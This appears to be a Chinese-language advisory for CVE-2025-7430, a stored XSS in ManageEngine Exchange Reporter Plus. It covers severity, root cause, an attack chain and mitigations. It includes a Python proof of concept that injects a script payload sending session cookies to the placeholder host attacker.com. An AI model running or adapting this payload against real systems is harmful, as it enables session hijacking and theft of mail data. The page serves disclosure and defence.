CVE-2025-7430 ManageEngine Exchange Reporter Plus存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-7430

漏洞类型

存储型XSS

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Zohocorp ManageEngine Exchange Reporter Plus

漏洞概述

CVE-2025-7430是Zohocorp ManageEngine Exchange Reporter Plus产品中的一个高危存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于Folder Message Count and Size报告功能中，攻击者可以通过在报告功能中注入恶意JavaScript代码，当其他用户查看该报告时，恶意代码将在其浏览器上下文中执行。漏洞的CVSS评分为7.3，属于高危级别，攻击向量为网络，攻击复杂度低，但需要低权限认证和用户交互。成功利用此漏洞可导致机密性受损（高）和完整性受损（高），但不影响可用性。ManageEngine Exchange Reporter Plus是一款企业级Microsoft Exchange服务器报告和分析工具，广泛应用于各类组织机构中。该漏洞于2025年11月11日披露，影响版本为5723及以下版本。由于漏洞性质为存储型XSS，一旦恶意脚本被注入，将持久存在于系统中，对所有查看受影响报告的用户构成持续威胁。

技术细节

该存储型XSS漏洞位于ManageEngine Exchange Reporter Plus的Folder Message Count and Size报告功能模块中。漏洞的根本原因在于应用程序未能对用户输入进行充分的输入验证和输出编码。攻击者以低权限用户身份登录系统后，可在创建或编辑Folder Message Count and Size报告时，在报告名称、文件夹路径或其他相关字段中注入恶意JavaScript代码（如<script>alert(document.cookie)</script>）。由于应用程序直接将该输入存储到数据库中并未进行安全处理，当其他用户（尤其是管理员）访问或查看该报告时，服务器会将存储的恶意内容作为响应的一部分返回给用户浏览器。浏览器将执行这些恶意脚本，从而允许攻击者窃取用户会话cookie、劫持用户账户、执行任意操作或进行进一步的攻击。由于Exchange Reporter Plus通常以高权限运行，攻击者成功利用此漏洞后可能获得对Exchange服务器的未授权访问权限，进而获取敏感邮件数据。

攻击链分析

STEP 1

步骤1

攻击者以低权限用户身份登录ManageEngine Exchange Reporter Plus系统

STEP 2

步骤2

攻击者导航至Folder Message Count and Size报告功能模块

STEP 3

步骤3

攻击者在报告名称、描述或文件夹路径等字段中注入恶意JavaScript代码（如<script>标签）

STEP 4

步骤4

应用程序将恶意输入未经充分过滤直接存储到数据库中

STEP 5

步骤5

当管理员或其他用户查看该报告时，服务器将包含恶意脚本的页面返回给用户

STEP 6

步骤6

用户浏览器执行恶意脚本，攻击者成功窃取会话cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-7430 PoC - Stored XSS in ManageEngine Exchange Reporter Plus
# Target: ManageEngine Exchange Reporter Plus <= version 5723

TARGET_URL = "http://target:8080"
USERNAME = "low_privilege_user"
PASSWORD = "password"

session = requests.Session()

# Step 1: Login to obtain session
login_url = f"{TARGET_URL}/api/v1/login"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}

response = session.post(login_url, json=login_data)
if response.status_code != 200:
    print("[-] Login failed")
    exit(1)

print("[+] Successfully logged in")

# Step 2: Create malicious Folder Message Count and Size report with XSS payload
create_report_url = f"{TARGET_URL}/api/v1/reports/folder-message-count"

xss_payload = "<script>var img=new Image();img.src='http://attacker.com/log?c='+document.cookie;</script>"

report_data = {
    "reportName": f"Folder Report {xss_payload}",
    "folderPath": "\\ mailbox \\ inbox",
    "description": "Report for testing" + xss_payload,
    "scheduleType": "once"
}

response = session.post(create_report_url, json=report_data)
if response.status_code in [200, 201]:
    print("[+] Malicious report created successfully")
    print(f"[+] XSS payload injected: {xss_payload}")
    print("[+] When admin views this report, cookie will be stolen")
else:
    print(f"[-] Failed to create report: {response.status_code}")
    print(response.text)

影响范围

ManageEngine Exchange Reporter Plus <= 5723

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制低权限用户创建或编辑报告的权限；2）启用双因素认证增强账户安全；3）对Exchange Reporter Plus的访问实施严格的IP白名单控制；4）监控日志中的异常请求模式；5）考虑暂时禁用Folder Message Count and Size报告功能；6）部署Web应用防火墙（WAF）规则检测和阻止XSS攻击尝试。